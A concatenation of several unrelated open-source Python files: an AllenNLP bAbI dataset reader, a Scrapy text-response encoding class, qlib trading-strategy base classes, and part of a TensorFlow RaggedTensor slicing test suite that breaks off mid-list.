"python-dateutil>=2.8.2",
],
)
|
import logging
from typing import Dict, List
from overrides import overrides
from allennlp.common.file_utils import cached_path
from allennlp.data.dataset_readers.dataset_reader import DatasetReader
from allennlp.data.instance import Instance
from allennlp.data.fields import Field, TextField, ListField, IndexField
from allennlp.data.token_indexers import TokenIndexer, SingleIdTokenIndexer
from allennlp.data.tokenizers import Token
logger = logging.getLogger(__name__)
@DatasetReader.register("babi")
class BabiReader(DatasetReader):
"""
Reads one single task in the bAbI tasks format as formulated in
Towards AI-Complete Question Answering: A Set of Prerequisite Toy Tasks
    (https://arxiv.org/abs/1502.05698). Since this class handles a single file,
    loading multiple tasks together requires merging them into a single file
    before using this reader.
# Parameters
keep_sentences : `bool`, optional, (default = `False`)
Whether to keep each sentence in the context or to concatenate them.
        The default is `False`, which corresponds to concatenation.
token_indexers : `Dict[str, TokenIndexer]`, optional (default=`{"tokens": SingleIdTokenIndexer()}`)
We use this to define the input representation for the text. See :class:`TokenIndexer`.
"""
def __init__(
self,
keep_sentences: bool = False,
token_indexers: Dict[str, TokenIndexer] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
self._keep_sentences = keep_sentences
self._token_indexers = token_indexers or {"tokens": SingleIdTokenIndexer()}
@overrides
def _read(self, file_path: str):
# if `file_path` is a URL, redirect to the cache
file_path = cached_path(file_path)
logger.info("Reading file at %s", file_path)
with open(file_path) as dataset_file:
dataset = dataset_file.readlines()
logger.info("Reading the dataset")
context: List[List[str]] = [[]]
for line in dataset:
if "?" in line:
question_str, answer, supports_str = line.replace("?", " ?").split("\t")
question = question_str.split()[1:]
supports = [int(support) - 1 for support in supports_str.split()]
yield self.text_to_instance(context, question, answer, supports)
else:
new_entry = line.replace(".", " .").split()[1:]
if line[0] == "1":
context = [new_entry]
else:
context.append(new_entry)
@overrides
def text_to_instance(
self, # type: ignore
context: List[List[str]],
question: List[str],
answer: str,
supports: List[int],
) -> Instance:
fields: Dict[str, Field] = {}
if self._keep_sentences:
context_field_ks = ListField(
[
TextField([Token(word) for word in line], self._token_indexers)
for line in context
]
)
fields["supports"] = ListField(
[IndexField(support, context_field_ks) for support in supports]
)
else:
context_field = TextField(
[Token(word) for line in context for word in line], self._token_indexers
)
fields["context"] = context_field_ks if self._keep_sentences else context_field
fields["question"] = TextField([Token(word) for word in question], self._token_indexers)
fields["answer"] = TextField([Token(answer)], self._token_indexers)
return Instance(fields)
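# A hedged usage sketch (not part of the reader): instantiating the reader and
# iterating over instances from a bAbI task file. The file path is hypothetical.
if __name__ == "__main__":
    reader = BabiReader(keep_sentences=True)
    for instance in reader.read("/path/to/qa1_single-supporting-fact_train.txt"):
        print(instance)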
|
"""
This module implements the TextResponse class, which adds encoding handling and
discovery (through HTTP headers) to the base Response class.
See documentation in docs/topics/request-response.rst
"""
import re
import codecs
from scrapy.xlib.BeautifulSoup import UnicodeDammit
from scrapy.http.response import Response
from scrapy.utils.python import memoizemethod_noargs
from scrapy.utils.encoding import encoding_exists, resolve_encoding
from scrapy.conf import settings
# The Python decoder doesn't follow the Unicode standard when handling
# badly encoded utf-8 strings. See http://bugs.python.org/issue8271
codecs.register_error('scrapy_replace', lambda exc: (u'\ufffd', exc.start+1))
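# For example, 'ok \xfa!'.decode('utf-8', 'scrapy_replace') yields u'ok \ufffd!':
# the offending byte is replaced with U+FFFD and decoding resumes one byte later.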
class TextResponse(Response):
_DEFAULT_ENCODING = settings['DEFAULT_RESPONSE_ENCODING']
_ENCODING_RE = re.compile(r'charset=([\w-]+)', re.I)
__slots__ = ['_encoding', '_cached_benc', '_cached_ubody']
def __init__(self, *args, **kwargs):
self._encoding = kwargs.pop('encoding', None)
self._cached_benc = None
self._cached_ubody = None
super(TextResponse, self).__init__(*args, **kwargs)
def _set_url(self, url):
if isinstance(url, unicode):
if self.encoding is None:
raise TypeError('Cannot convert unicode url - %s has no encoding' %
type(self).__name__)
self._url = url.encode(self.encoding)
else:
super(TextResponse, self)._set_url(url)
def _set_body(self, body):
self._body = ''
if isinstance(body, unicode):
if self.encoding is None:
raise TypeError('Cannot convert unicode body - %s has no encoding' %
type(self).__name__)
            self._body = body.encode(self.encoding)
else:
super(TextResponse, self)._set_body(body)
def replace(self, *args, **kwargs):
kwargs.setdefault('encoding', self.encoding)
return Response.replace(self, *args, **kwargs)
@property
def encoding(self):
return self._get_encoding(infer=True)
def _get_encoding(self, infer=False):
enc = self._declared_encoding()
if enc and not encoding_exists(enc):
enc = None
if not enc and infer:
enc = self._body_inferred_encoding()
if not enc:
enc = self._DEFAULT_ENCODING
return resolve_encoding(enc)
def _declared_encoding(self):
return self._encoding or self._headers_encoding() \
or self._body_declared_encoding()
def body_as_unicode(self):
"""Return body as unicode"""
if self._cached_ubody is None:
self._cached_ubody = self.body.decode(self.encoding, 'scrapy_replace')
return self._cached_ubody
@memoizemethod_noargs
def _headers_encoding(self):
content_type = self.headers.get('Content-Type')
if content_type:
m = self._ENCODING_RE.search(content_type)
if m:
encoding = m.group(1)
if encoding_exists(encoding):
return encoding
def _body_inferred_encoding(self):
if self._cached_benc is None:
enc = self._get_encoding()
dammit = UnicodeDammit(self.body, [enc])
benc = dammit.originalEncoding
self._cached_benc = benc
# UnicodeDammit is buggy decoding utf-16
if self._cached_ubody is None and benc != 'utf-16':
self._cached_ubody = dammit.unicode
return self._cached_benc
def _body_declared_encoding(self):
# implemented in subclasses (XmlResponse, HtmlResponse)
return None
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
from __future__ import annotations
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from qlib.backtest.exchange import Exchange
from qlib.backtest.position import BasePosition
from typing import List, Tuple, Union
from ..model.base import BaseModel
from ..data.dataset import DatasetH
from ..data.dataset.utils import convert_index_format
from ..rl.interpreter import ActionInterpreter, StateInterpreter
from ..utils import init_instance_by_config
from ..backtest.utils import CommonInfrastructure, LevelInfrastructure, TradeCalendarManager
from ..backtest.decision import BaseTradeDecision
__all__ = ["BaseStrategy", "ModelStrategy", "RLStrategy", "RLIntStrategy"]
class BaseStrategy:
"""Base strategy for trading"""
def __init__(
self,
outer_trade_decision: BaseTradeDecision = None,
level_infra: LevelInfrastructure = None,
common_infra: CommonInfrastructure = None,
trade_exchange: Exchange = None,
):
"""
Parameters
----------
outer_trade_decision : BaseTradeDecision, optional
            the trade decision of the outer strategy on which this strategy relies; it will be traded in [start_time, end_time], by default None
- If the strategy is used to split trade decision, it will be used
- If the strategy is used for portfolio management, it can be ignored
level_infra : LevelInfrastructure, optional
level shared infrastructure for backtesting, including trade calendar
common_infra : CommonInfrastructure, optional
            common infrastructure for backtesting, including trade_account, trade_exchange, etc.
trade_exchange : Exchange
exchange that provides market info, used to deal order and generate report
- If `trade_exchange` is None, self.trade_exchange will be set with common_infra
            - It allows different trade_exchanges to be used in different executions.
            - For example:
                - In daily execution, both the daily and the minutely exchange are usable, but the daily exchange is recommended because it runs faster.
                - In minutely execution, the daily exchange is not usable; only the minutely exchange can be used.
"""
self._reset(level_infra=level_infra, common_infra=common_infra, outer_trade_decision=outer_trade_decision)
self._trade_exchange = trade_exchange
@property
def trade_calendar(self) -> TradeCalendarManager:
return self.level_infra.get("trade_calendar")
@property
def trade_position(self) -> BasePosition:
return self.common_infra.get("trade_account").current_position
@property
def trade_exchange(self) -> Exchange:
"""get trade exchange in a prioritized order"""
return getattr(self, "_trade_exchange", None) or self.common_infra.get("trade_exchange")
def reset_level_infra(self, level_infra: LevelInfrastructure):
if not hasattr(self, "level_infra"):
self.level_infra = level_infra
else:
self.level_infra.update(level_infra)
def reset_common_infra(self, common_infra: CommonInfrastructure):
if not hasattr(self, "common_infra"):
self.common_infra: CommonInfrastructure = common_infra
else:
self.common_infra.update(common_infra)
def reset(
self,
level_infra: LevelInfrastructure = None,
common_infra: CommonInfrastructure = None,
outer_trade_decision=None,
**kwargs,
):
"""
        - reset `level_infra`, used to reset the trade calendar, etc.
        - reset `common_infra`, used to reset `trade_account`, `trade_exchange`, etc.
- reset `outer_trade_decision`, used to make split decision
**NOTE**:
        splitting this function into `reset` and `_reset` makes the following case more convenient:
        1. Users want to initialize their strategy by overriding `reset`, but they don't want to affect the `_reset` called
        during initialization
"""
self._reset(
level_infra=level_infra, common_infra=common_infra, outer_trade_decision=outer_trade_decision, **kwargs
)
def _reset(
self,
level_infra: LevelInfrastructure = None,
common_infra: CommonInfrastructure = None,
outer_trade_decision=None,
):
"""
Please refer to the docs of `reset`
"""
if level_infra is not None:
self.reset_level_infra(level_infra)
if common_infra is not None:
self.reset_common_infra(common_infra)
if outer_trade_decision is not None:
self.outer_trade_decision = outer_trade_decision
def generate_trade_decision(self, execute_result=None):
"""Generate trade decision in each trading bar
Parameters
----------
execute_result : List[object], optional
the executed result for trade decision, by default None
- When call the generate_trade_decision firstly, `execute_result` could be None
"""
raise NotImplementedError("generate_trade_decision is not implemented!")
def update_trade_decision(
self, trade_decision: BaseTradeDecision, trade_calendar: TradeCalendarManager
) -> Union[BaseTradeDecision, None]:
"""
        Update the trade decision in each step of the inner execution; this method enables all orders.
Parameters
----------
trade_decision : BaseTradeDecision
the trade decision that will be updated
trade_calendar : TradeCalendarManager
The calendar of the **inner strategy**!!!!!
Returns
-------
BaseTradeDecision:
"""
# default to return None, which indicates that the trade decision is not changed
return None
def alter_outer_trade_decision(self, outer_trade_decision: BaseTradeDecision):
"""
A method for updating the outer_trade_decision.
The outer strategy may change its decision during updating.
Parameters
----------
outer_trade_decision : BaseTradeDecision
the decision updated by the outer strategy
"""
# default to reset the decision directly
# NOTE: normally, user should do something to the strategy due to the change of outer decision
raise NotImplementedError(f"Please implement the `alter_outer_trade_decision` method")
# helper methods: not necessary but for convenience
def get_data_cal_avail_range(self, rtype: str = "full") -> Tuple[int, int]:
"""
return data calendar's available decision range for `self` strategy
the range consider following factors
- data calendar in the charge of `self` strategy
- trading range limitation from the decision of outer strategy
related methods
- TradeCalendarManager.get_data_cal_range
- BaseTradeDecision.get_data_cal_range_limit
Parameters
----------
rtype: str
- "full": return the available data index range of the strategy from `start_time` to `end_time`
- "step": return the available data index range of the strategy of current step
Returns
-------
Tuple[int, int]:
the available range both sides are closed
"""
cal_range = self.trade_calendar.get_data_cal_range(rtype=rtype)
if self.outer_trade_decision is None:
raise ValueError(f"There is not limitation for strategy {self}")
range_limit = self.outer_trade_decision.get_data_cal_range_limit(rtype=rtype)
return max(cal_range[0], range_limit[0]), min(cal_range[1], range_limit[1])
class ModelStrategy(BaseStrategy):
"""Model-based trading strategy, use model to make predictions for trading"""
def __init__(
self,
model: BaseModel,
dataset: DatasetH,
outer_trade_decision: BaseTradeDecision = None,
level_infra: LevelInfrastructure = None,
common_infra: CommonInfrastructure = None,
**kwargs,
):
"""
Parameters
----------
model : BaseModel
            the model used when making predictions
dataset : DatasetH
provide test data for model
kwargs : dict
arguments that will be passed into `reset` method
"""
super(ModelStrategy, self).__init__(outer_trade_decision, level_infra, common_infra, **kwargs)
self.model = model
self.dataset = dataset
self.pred_scores = convert_index_format(self.model.predict(dataset), level="datetime")
def _update_model(self):
"""
        When using online data, update the model in each bar with the following steps:
- update dataset with online data, the dataset should support online update
- make the latest prediction scores of the new bar
- update the pred score into the latest prediction
"""
raise NotImplementedError("_update_model is not implemented!")
class RLStrategy(BaseStrategy):
"""RL-based strategy"""
def __init__(
self,
policy,
outer_trade_decision: BaseTradeDecision = None,
level_infra: LevelInfrastructure = None,
common_infra: CommonInfrastructure = None,
**kwargs,
):
"""
Parameters
----------
policy :
RL policy for generate action
"""
super(RLStrategy, self).__init__(outer_trade_decision, level_infra, common_infra, **kwargs)
self.policy = policy
class RLIntStrategy(RLStrategy):
"""(RL)-based (Strategy) with (Int)erpreter"""
def __init__(
self,
policy,
state_interpreter: Union[dict, StateInterpreter],
action_interpreter: Union[dict, ActionInterpreter],
outer_trade_decision: BaseTradeDecision = None,
level_infra: LevelInfrastructure = None,
common_infra: CommonInfrastructure = None,
**kwargs,
):
"""
Parameters
----------
state_interpreter : Union[dict, StateInterpreter]
            interpreter that interprets the qlib execution result into the RL env state
action_interpreter : Union[dict, ActionInterpreter]
            interpreter that interprets the RL agent action into a qlib order list
start_time : Union[str, pd.Timestamp], optional
start time of trading, by default None
end_time : Union[str, pd.Timestamp], optional
end time of trading, by default None
"""
super(RLIntStrategy, self).__init__(policy, outer_trade_decision, level_infra, common_infra, **kwargs)
self.policy = policy
self.state_interpreter = init_instance_by_config(state_interpreter, accept_types=StateInterpreter)
self.action_interpreter = init_instance_by_config(action_interpreter, accept_types=ActionInterpreter)
def generate_trade_decision(self, execute_result=None):
_interpret_state = self.state_interpreter.interpret(execute_result=execute_result)
_action = self.policy.step(_interpret_state)
_trade_decision = self.action_interpreter.interpret(action=_action)
return _trade_decision
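# A hedged, minimal sketch (not part of qlib) of a BaseStrategy subclass that
# implements `generate_trade_decision`. It assumes qlib's TradeDecisionWO class
# accepts an order list and the strategy instance; treat the import location
# and signature below as assumptions rather than a definitive API.
class DoNothingStrategy(BaseStrategy):
    """Toy strategy that submits no orders in any trading bar."""
    def generate_trade_decision(self, execute_result=None):
        from ..backtest.decision import TradeDecisionWO  # assumed location/signature
        # An empty order list: hold the current position for this bar.
        return TradeDecisionWO([], self)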
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for third_party.tensorflow.python.ops.ragged_tensor."""
import re
from absl.testing import parameterized
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops.ragged import ragged_factory_ops
from tensorflow.python.ops.ragged.ragged_tensor import RaggedTensor
from tensorflow.python.platform import googletest
class _SliceBuilder:
"""Helper to construct arguments for __getitem__.
  Usage: _SliceBuilder()[<expr>] returns the slice_spec that Python generates for <expr>.
"""
def __getitem__(self, slice_spec):
return slice_spec
SLICE_BUILDER = _SliceBuilder()
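# For example, SLICE_BUILDER[1:3, ..., 0] evaluates to the tuple
# (slice(1, 3, None), Ellipsis, 0), i.e. exactly the slice_spec Python would
# pass to __getitem__ for rt[1:3, ..., 0].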
def _make_tensor_slice_spec(slice_spec, use_constant=True):
"""Wraps all integers in an extended slice spec w/ a tensor.
This function is used to help test slicing when the slice spec contains
tensors, rather than integers.
Args:
slice_spec: The extended slice spec.
use_constant: If true, then wrap each integer with a tf.constant. If false,
then wrap each integer with a tf.placeholder.
Returns:
A copy of slice_spec, but with each integer i replaced with tf.constant(i).
"""
def make_piece_scalar(piece):
if isinstance(piece, int):
scalar = constant_op.constant(piece)
if use_constant:
return scalar
else:
return array_ops.placeholder_with_default(scalar, [])
elif isinstance(piece, slice):
return slice(
make_piece_scalar(piece.start), make_piece_scalar(piece.stop),
make_piece_scalar(piece.step))
else:
return piece
if isinstance(slice_spec, tuple):
return tuple(make_piece_scalar(piece) for piece in slice_spec)
else:
return make_piece_scalar(slice_spec)
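# For example, _make_tensor_slice_spec(SLICE_BUILDER[1:3, 0]) returns
# (slice(tf.constant(1), tf.constant(3), None), tf.constant(0)): each Python
# int is wrapped in a constant (or in a placeholder when use_constant=False).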
# Example 2D ragged tensor value with one ragged dimension and with scalar
# values, expressed as nested python lists and as splits+values.
EXAMPLE_RAGGED_TENSOR_2D = [[b'a', b'b'], [b'c', b'd', b'e'], [b'f'], [],
[b'g']]
EXAMPLE_RAGGED_TENSOR_2D_SPLITS = [0, 2, 5, 6, 6, 7]
EXAMPLE_RAGGED_TENSOR_2D_VALUES = ['a', 'b', 'c', 'd', 'e', 'f', 'g']
# Example 4D ragged tensor value, with two ragged dimensions and with values
# whose shape is [2], expressed as nested python lists and as splits+values.
EXAMPLE_RAGGED_TENSOR_4D = [
[ # rt[0]
[[1, 2], [3, 4], [5, 6]], # rt[0][0]
[[7, 8], [9, 10], [11, 12]]], # rt[0][1]
[], # rt[1]
[ # rt[2]
[[13, 14], [15, 16], [17, 18]]], # rt[2][0]
[ # rt[3]
[[19, 20]]] # rt[3][0]
] # pyformat: disable
EXAMPLE_RAGGED_TENSOR_4D_SPLITS1 = [0, 2, 2, 3, 4]
EXAMPLE_RAGGED_TENSOR_4D_SPLITS2 = [0, 3, 6, 9, 10]
EXAMPLE_RAGGED_TENSOR_4D_VALUES = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10],
[11, 12], [13, 14], [15, 16], [17, 18],
[19, 20]]
# Example 3D ragged tensor with uniform_row_lengths.
EXAMPLE_RAGGED_TENSOR_3D = [[[1, 2, 3], [4], [5, 6]], [[], [7, 8, 9], []]]
EXAMPLE_RAGGED_TENSOR_3D_ROWLEN = 3
EXAMPLE_RAGGED_TENSOR_3D_SPLITS = [0, 3, 4, 6, 6, 9, 9]
EXAMPLE_RAGGED_TENSOR_3D_VALUES = [1, 2, 3, 4, 5, 6, 7, 8, 9]
@test_util.run_all_in_graph_and_eager_modes
class RaggedGetItemTest(test_util.TensorFlowTestCase, parameterized.TestCase):
  longMessage = True  # Property in unittest.TestCase. pylint: disable=invalid-name
#=============================================================================
# RaggedTensor.__getitem__
#=============================================================================
def _TestGetItem(self, rt, slice_spec, expected, expected_shape=None):
"""Helper function for testing RaggedTensor.__getitem__.
    Checks that calling `rt.__getitem__(slice_spec)` returns the expected value.
Checks three different configurations for each slice spec:
* Call __getitem__ with the slice spec as-is (with int values)
* Call __getitem__ with int values in the slice spec wrapped in
`tf.constant()`.
* Call __getitem__ with int values in the slice spec wrapped in
`tf.compat.v1.placeholder()` (so value is not known at graph
construction time).
Args:
rt: The RaggedTensor to test.
slice_spec: The slice spec.
expected: The expected value of rt.__getitem__(slice_spec), as a python
list; or an exception class.
expected_shape: The expected shape for `rt.__getitem__(slice_spec)`.
"""
tensor_slice_spec1 = _make_tensor_slice_spec(slice_spec, True)
tensor_slice_spec2 = _make_tensor_slice_spec(slice_spec, False)
value1 = rt.__getitem__(slice_spec)
value2 = rt.__getitem__(tensor_slice_spec1)
value3 = rt.__getitem__(tensor_slice_spec2)
self.assertAllEqual(value1, expected, 'slice_spec=%s' % (slice_spec,))
self.assertAllEqual(value2, expected, 'slice_spec=%s' % (slice_spec,))
self.assertAllEqual(value3, expected, 'slice_spec=%s' % (slice_spec,))
if expected_shape is not None:
value1.shape.assert_is_compatible_with(expected_shape)
value2.shape.assert_is_compatible_with(expected_shape)
value3.shape.assert_is_compatible_with(expected_shape)
def _TestGetItemException(self, rt, slice_spec, expected, message):
"""Helper function for testing RaggedTensor.__getitem__ exceptions."""
tensor_slice_spec = _make_tensor_slice_spec(slice_spec, True)
with self.assertRaisesRegex(expected, message):
self.evaluate(rt.__getitem__(slice_spec))
with self.assertRaisesRegex(expected, message):
self.evaluate(rt.__getitem__(tensor_slice_spec))
@parameterized.parameters(
# Tests for rt[i]
(SLICE_BUILDER[-5], EXAMPLE_RAGGED_TENSOR_2D[-5]),
(SLICE_BUILDER[-4], EXAMPLE_RAGGED_TENSOR_2D[-4]),
(SLICE_BUILDER[-1], EXAMPLE_RAGGED_TENSOR_2D[-1]),
(SLICE_BUILDER[0], EXAMPLE_RAGGED_TENSOR_2D[0]),
(SLICE_BUILDER[1], EXAMPLE_RAGGED_TENSOR_2D[1]),
(SLICE_BUILDER[4], EXAMPLE_RAGGED_TENSOR_2D[4]),
# Tests for rt[i:]
(SLICE_BUILDER[-6:], EXAMPLE_RAGGED_TENSOR_2D[-6:]),
(SLICE_BUILDER[-3:], EXAMPLE_RAGGED_TENSOR_2D[-3:]),
(SLICE_BUILDER[-1:], EXAMPLE_RAGGED_TENSOR_2D[-1:]),
(SLICE_BUILDER[0:], EXAMPLE_RAGGED_TENSOR_2D[0:]),
(SLICE_BUILDER[3:], EXAMPLE_RAGGED_TENSOR_2D[3:]),
(SLICE_BUILDER[5:], EXAMPLE_RAGGED_TENSOR_2D[5:]),
# Tests for rt[:j]
(SLICE_BUILDER[:-6], EXAMPLE_RAGGED_TENSOR_2D[:-6]),
(SLICE_BUILDER[:-3], EXAMPLE_RAGGED_TENSOR_2D[:-3]),
(SLICE_BUILDER[:-1], EXAMPLE_RAGGED_TENSOR_2D[:-1]),
(SLICE_BUILDER[:0], EXAMPLE_RAGGED_TENSOR_2D[:0]),
(SLICE_BUILDER[:3], EXAMPLE_RAGGED_TENSOR_2D[:3]),
(SLICE_BUILDER[:5], EXAMPLE_RAGGED_TENSOR_2D[:5]),
# Tests for rt[i:j]
(SLICE_BUILDER[0:3], EXAMPLE_RAGGED_TENSOR_2D[0:3]),
(SLICE_BUILDER[3:5], EXAMPLE_RAGGED_TENSOR_2D[3:5]),
(SLICE_BUILDER[-5:3], EXAMPLE_RAGGED_TENSOR_2D[-5:3]),
(SLICE_BUILDER[3:1], EXAMPLE_RAGGED_TENSOR_2D[3:1]),
(SLICE_BUILDER[-1:1], EXAMPLE_RAGGED_TENSOR_2D[-1:1]),
(SLICE_BUILDER[1:-1], EXAMPLE_RAGGED_TENSOR_2D[1:-1]),
# Tests for rt[i, j]
(SLICE_BUILDER[0, 1], EXAMPLE_RAGGED_TENSOR_2D[0][1]),
(SLICE_BUILDER[1, 2], EXAMPLE_RAGGED_TENSOR_2D[1][2]),
(SLICE_BUILDER[-1, 0], EXAMPLE_RAGGED_TENSOR_2D[-1][0]),
(SLICE_BUILDER[-3, 0], EXAMPLE_RAGGED_TENSOR_2D[-3][0]),
(SLICE_BUILDER[:], EXAMPLE_RAGGED_TENSOR_2D),
(SLICE_BUILDER[:, :], EXAMPLE_RAGGED_TENSOR_2D),
# Empty slice spec.
([], EXAMPLE_RAGGED_TENSOR_2D),
# Test for ellipsis
(SLICE_BUILDER[...], EXAMPLE_RAGGED_TENSOR_2D),
(SLICE_BUILDER[2, ...], EXAMPLE_RAGGED_TENSOR_2D[2]),
(SLICE_BUILDER[..., :], EXAMPLE_RAGGED_TENSOR_2D),
(SLICE_BUILDER[..., 2, 0], EXAMPLE_RAGGED_TENSOR_2D[2][0]),
(SLICE_BUILDER[2, ..., 0], EXAMPLE_RAGGED_TENSOR_2D[2][0]),
(SLICE_BUILDER[2, 0, ...], EXAMPLE_RAGGED_TENSOR_2D[2][0]),
# Test for array_ops.newaxis
(SLICE_BUILDER[array_ops.newaxis, :], [EXAMPLE_RAGGED_TENSOR_2D]),
(SLICE_BUILDER[:, array_ops.newaxis],
[[row] for row in EXAMPLE_RAGGED_TENSOR_2D]),
# Slicing inner ragged dimensions.
(SLICE_BUILDER[-1:,
1:4], [row[1:4] for row in EXAMPLE_RAGGED_TENSOR_2D[-1:]]),
(SLICE_BUILDER[:, 1:4], [row[1:4] for row in EXAMPLE_RAGGED_TENSOR_2D]),
(SLICE_BUILDER[:, -2:], [row[-2:] for row in EXAMPLE_RAGGED_TENSOR_2D]),
# Strided slices
(SLICE_BUILDER[::2], EXAMPLE_RAGGED_TENSOR_2D[::2]),
(SLICE_BUILDER[::-1], EXAMPLE_RAGGED_TENSOR_2D[::-1]),
(SLICE_BUILDER[::-2], EXAMPLE_RAGGED_TENSOR_2D[::-2]),
(SLICE_BUILDER[::-3], EXAMPLE_RAGGED_TENSOR_2D[::-3]),
(SLICE_BUILDER[:, ::2], [row[::2] for row in EXAMPLE_RAGGED_TENSOR_2D]),
(SLICE_BUILDER[:, ::-1], [row[::-1] for row in EXAMPLE_RAGGED_TENSOR_2D]),
(SLICE_BUILDER[:, ::-2], [row[::-2] for row in EXAMPLE_RAGGED_TENSOR_2D]),
(SLICE_BUILDER[:, ::-3], [row[::-3] for row in EXAMPLE_RAGGED_TENSOR_2D]),
(SLICE_BUILDER[:, 2::-1],
[row[2::-1] for row in EXAMPLE_RAGGED_TENSOR_2D]),
(SLICE_BUILDER[:, -1::-1],
[row[-1::-1] for row in EXAMPLE_RAGGED_TENSOR_2D]),
(SLICE_BUILDER[..., -1::-1],
[row[-1::-1] for row in EXAMPLE_RAGGED_TENSOR_2D]),
(SLICE_BUILDER[:, 2::-2],
[row[2::-2] for row in EXAMPLE_RAGGED_TENSOR_2D]),
(SLICE_BUILDER[::-1, ::-1],
[row[::-1] for row in EXAMPLE_RAGGED_TENSOR_2D[::-1]]),
) # pyformat: disable
def testWithRaggedRank1(self, slice_spec, expected):
"""Test that rt.__getitem__(slice_spec) == expected."""
# Ragged tensor
rt = RaggedTensor.from_row_splits(EXAMPLE_RAGGED_TENSOR_2D_VALUES,
EXAMPLE_RAGGED_TENSOR_2D_SPLITS)
self.assertAllEqual(rt, EXAMPLE_RAGGED_TENSOR_2D)
self._TestGetItem(rt, slice_spec, expected)
# pylint: disable=g-complex-comprehension
@parameterized.parameters([(start, stop)
for start in [-2, -1, None, 0, 1, 2]
for stop in [-2, -1, None, 0, 1, 2]])
def testWithStridedSlices(self, start, stop):
test_value = [[1, 2, 3, 4, 5], [6, 7], [8, 9, 10], [], [9],
[1, 2, 3, 4, 5, 6, 7, 8]]
rt = ragged_factory_ops.constant(test_value)
for step in [-3, -2, -1, 1, 2, 3]:
# Slice outer dimension
self.assertAllEqual(rt[start:stop:step], test_value[start:stop:step],
'slice=%s:%s:%s' % (start, stop, step))
# Slice inner dimension
self.assertAllEqual(rt[:, start:stop:step],
[row[start:stop:step] for row in test_value],
'slice=%s:%s:%s' % (start, stop, step))
# pylint: disable=invalid-slice-index
@parameterized.parameters(
# Tests for out-of-bound errors
(SLICE_BUILDER[5], (IndexError, ValueError, errors.InvalidArgumentError),
'.*out of bounds.*'),
(SLICE_BUILDER[-6], (IndexError, ValueError, errors.InvalidArgumentError),
'.*out of bounds.*'),
(SLICE_BUILDER[0, 2], (IndexError, ValueError,
errors.InvalidArgumentError), '.*out of bounds.*'),
(SLICE_BUILDER[3, 0], (IndexError, ValueError,
errors.InvalidArgumentError), '.*out of bounds.*'),
# Indexing into an inner ragged dimension
(SLICE_BUILDER[:, 3], ValueError,
'Cannot index into an inner ragged dimension'),
(SLICE_BUILDER[:1, 3], ValueError,
'Cannot index into an inner ragged dimension'),
(SLICE_BUILDER[..., 3], ValueError,
'Cannot index into an inner ragged dimension'),
# Tests for type errors
(SLICE_BUILDER[0.5], TypeError, re.escape(array_ops._SLICE_TYPE_ERROR)),
(SLICE_BUILDER[1:3:0.5], TypeError, re.escape(
array_ops._SLICE_TYPE_ERROR)),
(SLICE_BUILDER[:, 1:3:0.5], TypeError,
'slice strides must be integers or None'),
(SLICE_BUILDER[:, 0.5:1.5], TypeError,
'slice offsets must be integers or None'),
(SLICE_BUILDER['foo'], TypeError, re.escape(array_ops._SLICE_TYPE_ERROR)),
(SLICE_BUILDER[:, 'foo':'foo'], TypeError,
'slice offsets must be integers or None'),
# Tests for other errors
(SLICE_BUILDER[..., 0, 0,
0], IndexError, 'Too many indices for RaggedTensor'),
)
def testErrorsWithRaggedRank1(self, slice_spec, expected, message):
"""Test that rt.__getitem__(slice_spec) == expected."""
# Ragged tensor
rt = RaggedTensor.from_row_splits(EXAMPLE_RAGGED_TENSOR_2D_VALUES,
EXAMPLE_RAGGED_TENSOR_2D_SPLITS)
self.assertAllEqual(rt, EXAMPLE_RAGGED_TENSOR_2D)
self._TestGetItemException(rt, slice_spec, expected, message)
@parameterized.parameters(
# Tests for rt[index, index, ...]
(SLICE_BUILDER[2, 0], EXAMPLE_RAGGED_TENSOR_4D[2][0]),
(SLICE_BUILDER[2, 0, 1], EXAMPLE_RAGGED_TENSOR_4D[2][0][1]),
(SLICE_BUILDER[2, 0, 1, 1], EXAMPLE_RAGGED_TENSOR_4D[2][0][1][1]),
(SLICE_BUILDER[2, 0, 1:], EXAMPLE_RAGGED_TENSOR_4D[2][0][1:]),
(SLICE_BUILDER[2, 0, 1:, 1:], [[16], [18]]),
(SLICE_BUILDER[2, 0, :, 1], [14, 16, 18]),
(SLICE_BUILDER[2, 0, 1, :], EXAMPLE_RAGGED_TENSOR_4D[2][0][1]),
# Tests for rt[index, slice, ...]
(SLICE_BUILDER[0, :], EXAMPLE_RAGGED_TENSOR_4D[0]),
(SLICE_BUILDER[1, :], EXAMPLE_RAGGED_TENSOR_4D[1]),
(SLICE_BUILDER[0, :, :, 1], [[2, 4, 6], [8, 10, 12]]),
(SLICE_BUILDER[1, :, :, 1], []),
(SLICE_BUILDER[2, :, :, 1], [[14, 16, 18]]),
(SLICE_BUILDER[3, :, :, 1], [[20]]),
# Tests for rt[slice, slice, ...]
(SLICE_BUILDER[:, :], EXAMPLE_RAGGED_TENSOR_4D),
(SLICE_BUILDER[:, :, :, 1], [[[2, 4, 6], [8, 10, 12]], [], [[14, 16, 18]],
[[20]]]),
(SLICE_BUILDER[1:, :, :, 1], [[], [[14, 16, 18]], [[20]]]),
(SLICE_BUILDER[-3:, :, :, 1], [[], [[14, 16, 18]], [[20]]]),
# Test for ellipsis
(SLICE_BUILDER[...], EXAMPLE_RAGGED_TENSOR_4D),
(SLICE_BUILDER[2, ...], EXAMPLE_RAGGED_TENSOR_4D[2]),
(SLICE_BUILDER[2, 0, ...], EXAMPLE_RAGGED_TENSOR_4D[2][0]),
(SLICE_BUILDER[..., 0], [[[1, 3, 5], [7, 9, 11]], [], [[13, 15, 17]],
[[19]]]),
(SLICE_BUILDER[2, ..., 0], [[13, 15, 17]]),
(SLICE_BUILDER[2, 0, ..., 0], [13, 15, 17]),
# Test for array_ops.newaxis
(SLICE_BUILDER[array_ops.newaxis, :], [EXAMPLE_RAGGED_TENSOR_4D]),
